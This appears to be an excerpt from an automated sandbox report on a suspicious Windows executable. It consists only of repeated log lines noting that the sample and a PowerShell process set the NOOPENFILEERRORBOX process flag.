Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
